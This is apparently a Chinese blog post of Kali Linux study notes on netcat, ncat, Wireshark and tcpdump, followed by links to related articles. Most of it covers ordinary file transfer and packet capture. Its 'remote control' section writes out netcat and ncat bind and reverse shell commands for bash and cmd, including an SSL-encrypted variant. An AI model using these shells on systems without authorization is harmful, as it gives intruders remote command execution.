Netcat,Wireshark,Tcpdump简介与使用

最新推荐文章于 2020-07-25 15:17:02 发布
最新推荐文章于 2020-07-25 15:17:02 发布
阅读量823 收藏
点赞数
分类专栏: kali 文章标签: kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39353923/article/details/82119297
版权

Netcat,Tcpdump

NETCAT—NC
1. 网络工具中的瑞士军刀—小身材,大智慧
2. 侦听模式/传统模式
3. telnet/获取banner信息,nc使用telnet远程连接,
命令为:nc –nv 目标地址 目标端口
4. 传输文本信息(默认不加密):
例:A:nc –l –p 4444 作为服务端
-l表示打开监听模式,打开某个端口
-P:后面指定具体的端口
B:连接A主机:nc –nv A的地址 (4444)端口号,然后两台电脑就可以聊天啦
5. 传输文件/目录(默认不加密):
传输文件:
A作为接收端打开端口:nc –lp 333 > 1.mp4(B里面的文件名)
B作为发送端:nc –nv 1.1.1.1(A的地址) 333 < 1.mp4(B里面的文件) -q 1
传输目录:
6. 加密控制/木马
7. 加密所有的流量
8. 流媒体服务器
9. 远程克隆硬盘
使用mtr软件可以追踪路由:mtr +ip地址,需要安装mtr软件包
在kali linux下进行base64编码:
加密::
echo HelloWorld | base64
加密后得到的值为:SGVsbG9Xb3JsZAo=
解密:
echo SGVsbG9Xb3JsZAo= | base64 -d
解密之后得到的值为:HelloWorld
在kali终端下输入:nc –h查看nc使用方法
-v:显示详细的连接信息
-n:连接IP地址,只能是纯数字,不能是域名
例:nc –vn 123.125.50.29(网易邮箱) 110(端口) :远程连接网易邮箱的110端口,可以显示其邮箱信息
使用netstat –pantu 查看端口信息
使用nc进行远程远程电子取证(尽一切可能在被审计的对象系统上尽量少的修改系统现有的状态,避免破坏可以收集到的证据)
1:在一台客户端监听某端口:nc -l -p 333
2:在另一台被审计的对象系统上输入:ls –l | nc –nv 10.1.1.1 333,如此输入不破坏证据
3:参数-q +数字表示在进行一个命令之后多少秒之后自动断开
NC—-远程控制
LINUX下:A主机:nc –l –p 3333 –c bash (-c bash指定把bash命令传送给本机的3333端口)
B主机:nc –nv 10.1.1.1 3333
或者:A主机:nc –l –p 3333
B主机:nc –nv 10.1.1.1 3333 –c bash(则是B主机远程控制A主机 )
WINDOWS下:A主机:nc –l –p 3333 –c cmd
B主机:nc –nv 10.1.1.1 3333
NC的缺点:nc缺乏加密和身份验证的能力,不同系统/平台的nc
ncat弥补nc的缺陷,包含与nmap工具包中
ncat管道是加密的,被嗅探也不容易被看到
A:ncat –c bash –allow 10.1.1.1 –vnl 333 –ssl
(–allow:允许哪个具体的Ip地址连接本机
–ssl:使用ssl协议将通信管道进行加密)
B:ncat –nv 1.1.1.1 333 –ssl
Wireshark:
抓包嗅探协议分析
安全专家必备的技能
抓包引擎:Libpcap9—–Linux
Winpcap10—–Windows
解码能力
使用方法:1,选择一个用来抓包的网卡
2,开启抓包,可以设置抓包的内容
3,保存为.pcap格式,适用于其他抓包软件的格式
Promiscuous mode :混杂模式
Wireshark—-筛选器
1,过滤掉干扰的数据包
2,抓包筛选器
3,显示筛选器

TCPDUMP:1,no-GUI的抓包分析工具
2,Linux,Unix系统默认安装
抓包:默认只抓68个字节
tcpdump –i eth0 –s 0 –w file.pcap
tcpdump –i eth0 port 22:指定抓取eth0网卡22号端口的包
读取抓包文件:tcpdump –r file.pcap
参数: -I :指定特定的端口去抓包
-s:指定抓取包的大小,后面跟数字0表示抓完整的包
-w:把抓到的所有包放到某个文件里面去,后面指定文件名
-r:读取数据包内容,如:tcpdump –r a.cap

TCPDUMP—–显示筛选器
1,tcpdump –n –r http.cap | awk ‘{print $3}’ | sort –u
-n表示不把ip地址转化成域名,只使用ip的形式去抓包
然后把输出的内容只显示第三列的内容
Sort –u:排序,去除重复项,只保存有用项
2,tcpdump –n src host 145.254.160.237 –r http.cap
Src host ip:表示只选取源主机地址为本IP的数据包信息
3,tcpdump –n dst host 145.254.160.237 –r http.cap
dst host ip:表示只选取目的主机地址为本IP的数据包信息
4,tcpdump –n port 80 –r http.cap
查看在http.cap这个文件里面端口号为80的数据包信息
Port +端口号:指定特定的端口号
过程文档记录:
Dradis:适用临时小团队资源共享/导入插件导入文件
其侦听3004端口,默认不需要登陆账号,只设置密码就可以进入

Louisnie
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WiresharkNetcat
weixin_30315905的博客
03-18 132
Wireshark Wireshark是一个网络数据包分析软件,功能是截取网络数据包,并尽可能显示出最为详细的网络数据包数据。为了安全考虑,wireshark只能查看封包,而不能修改封包的内容,或者发送封包。 界面 抓包获取 点击捕获->设置,设置混杂模式,选中需要监听的接口,点击“开始”,开始捕获数据: 过滤 捕捉过滤器是数据经过的第一层过滤器,它用于控制捕捉数据的数量,...
一些常用linux网络工具的经验共享--Tcpdump,Nmap,Netstat,nc
浮白
03-07 5396
<br />Tcpdump-转储网络上的数据流<br /><br /> Tcpdump能够截获当前所有通过本机网卡的数据包。它拥有灵活的过滤机制,可以确保得到想要的数据。由于Tcpdump 只能收集通过本机的数据,因此它的应用受到了一些限制,大多应用在网关或服务器自我检测上。例如,在作为网关的主机上,想知道本地网络中IP 地址为192.168.0.5 的主机现在与外界通信的情况,就可以使用如下命令:<br /><br /> tcpdump -i eth0 src host 192.168.0.5<
Wireshark使用说明
ppzlyg的专栏
11-12 2877
wireshark使用说明 打开软件 选择Capture----Interfance 选择用于抓取包的网卡,点击Start 主界面 Protocol(协议): 可能的值: ether, fddi, ip, arp, rarp, decnet, lat, sca, moprc, mopdl, tcp and udp. 如果没有特别指明是什么协议,则默认使用所有支持的协议。 Direction(方向): 可能的值: src, dst, src and dst
cpp-pmdump是一个简单的工具可在Linux或Android上提供进程内存获取
08-16
pmdump是一个简单的工具,可在Linux或Android上提供进程内存获取。 Pmdump使用来自/ proc // maps文件的头信息转储进程内存。 数据被转储到文件或整个网络。
实验二——网络监听与数据包修改.doc
06-25
Wireshark 使用Tcpdump 相似的过滤规则,并且可以很方便地存储已经设置好的过滤规则。 在 Wireshark 中添加过滤器时,需要为该过滤器指定名字及规则。例如,要在主机 192.168.0.3 和 192.168.0.11 间创建过滤器...
TCPIP协议分析方法
09-23
在分析TCP/IP协议时,常用的工具有Wiresharktcpdumpnetcat等。Wireshark是一款强大的网络封包分析软件,可以捕获并显示网络流量,帮助我们深入解析每一个网络包的细节。使用Wireshark,我们可以查看源和目标IP...
网络命令行的使用和范例
02-23
8. **tcpdump/wireshark**:高级网络嗅探工具,用于捕获网络流量并进行分析,是排查网络问题的利器。例如,`tcpdump -i eth0 port 80` 在eth0接口上抓取HTTP流量。 在“网络命令行的使用和范例”中,你可能找到更多...
大数据采集技术-Flume监控本地端口.pptx
12-23
为了监控端口中的具体信息,你可能需要结合其他监控工具,如`tcpdump`或`Wireshark`,它们能帮助你查看网络流量和数据包详情。`tcpdump`可以捕获特定端口的数据包,例如: ```bash sudo tcpdump -i lo port 44444 ``...
nc (NetCat) 网络安全工具介绍
cavalier的学习之路
05-04 9244
搞系统安全的人,可能没人没听说过大名鼎鼎的nc吧,它可以代替telnet,可以启监听程序,可以用来传输文件,可以用来作为黑客辅助程序,深受大量hacker的喜爱,其功能有如瑞士军刀般好用。 NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection)。它被设计成一个可靠的后端(back-end)工具,能被其它的程序程序或脚本直接地或容易地驱动
Linux系统终端命令:netcat的基本使用
热门推荐
C/C++攻城狮
03-26 3万+
1.前言 1.1声明 文章中的文字可能存在语法错误以及标点错误,请谅解; 如果在文章中发现代码错误或其它问题请告知,感谢! 2.netcat使用 2.1netcat介绍 netccat是一个通过TCP/UDP在网络中进行读写数据工具(命令),被称为“瑞士军刀”,主要用于调试领域、传输领域甚至黑客攻击领域。利用该工具,可以将网络中一端的数据完整的发送至另一台主机终端显示或存...
NetCat(nc)工具的使用步骤
风的专栏
03-07 1521
总体感觉nc工具并不好使用。如在测试udp端口是否存在时,总是返回端口已存在的提示信息。nc的安装:http://blog.csdn.net/mynamepg/article/details/79469159nc命令:http://blog.csdn.net/mynamepg/article/details/79469232nc -help...
NC抓包上传
think_ycx的专栏
10-15 1170
入侵中国某大型商业网站服务器全记录
wireshark捕获/过滤指定ip地址数据包
u010068160的博客
07-25 4821
使用捕获或者显示过滤,wireshark可以仅捕获/显示经过指定ip的数据包,即某个ip收到或者发出的所有数据包。wireshare捕获/显示过滤使用方法见“wireshare过滤器”。 显示过滤:wireshark过滤经过指定ip的数据包 显示过滤可以完整的复现测试时的网络环境,但会产生较大的捕获文件和内存占用。 ip.addr ==192.168.1.1 //显示所有目标或源地址是192.168.1.1的数据包 ip.dst==192.168.1.1 //显示目标地址是192.168.1.1的数据
netcat使用(均来自互联网,收集整理供自己查阅)
peak_liu的专栏
11-26 1060
netcat使用指南 来自黑客在线    发布人:绿血人
网络常用探测命令:nmap / ncat / tcpdump
weixin_44983653的博客
07-29 4459
网络常用探测命令:nmap / ncat / tcpdumpnmap概述语法OPTIONSARGUMENTS使用示例nc / ncat概述语法OPTIONSARGUMENTSPORTS示例Port Scanning(端口扫描)Chat ServerFile transfertcpdump概述语法OPTIONSARGUMENTS示例监视指定网络接口的数据包监视指定主机的数据包监视指定主机和端口的数据...
超级详细Tcpdump 的用法
会哭的雨@的博客
08-02 1万+
1、抓取回环网口的包:tcpdump -i lo 2、防止包截断:tcpdump -s0 3、以数字显示主机及端口:tcpdump -n 第一种是关于类型的关键字,主要包括host,net,port, 例如 host 210.27.48.2,指明 210.27.48.2是一台主机,net 202.0.0.0 指明 202.0.0.0是一个网络地址,port 23 指明端口号是23。如...
Android 用 adb forword + Tcpdump + Wireshark 实时抓包的方法
IT毁灭者
11-22 2773
运行环境: 手机: 安装netcat(敲一下 nc 或者 busybox nc 检测一下) 安装tcpdump 已经root 电脑: 安装wireshark 安装netcat 使用方法: 手机: tcpdump -i any -p -s 0 -w - | busybox nc -l -p 11234 电脑: adb forward tcp:11234 tcp:11234 nc 127.0.0.
wireshark发送数据包
最新发布
06-13
5. **发送数据包**:通常,你不会直接从Wireshark发送数据包到网络,而是在控制台上使用相关工具(如`netcat`或`ncat`),将Wireshark捕获的数据包内容复制到命令行,并指定目标地址发送。 6. **查看结果**:发送...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值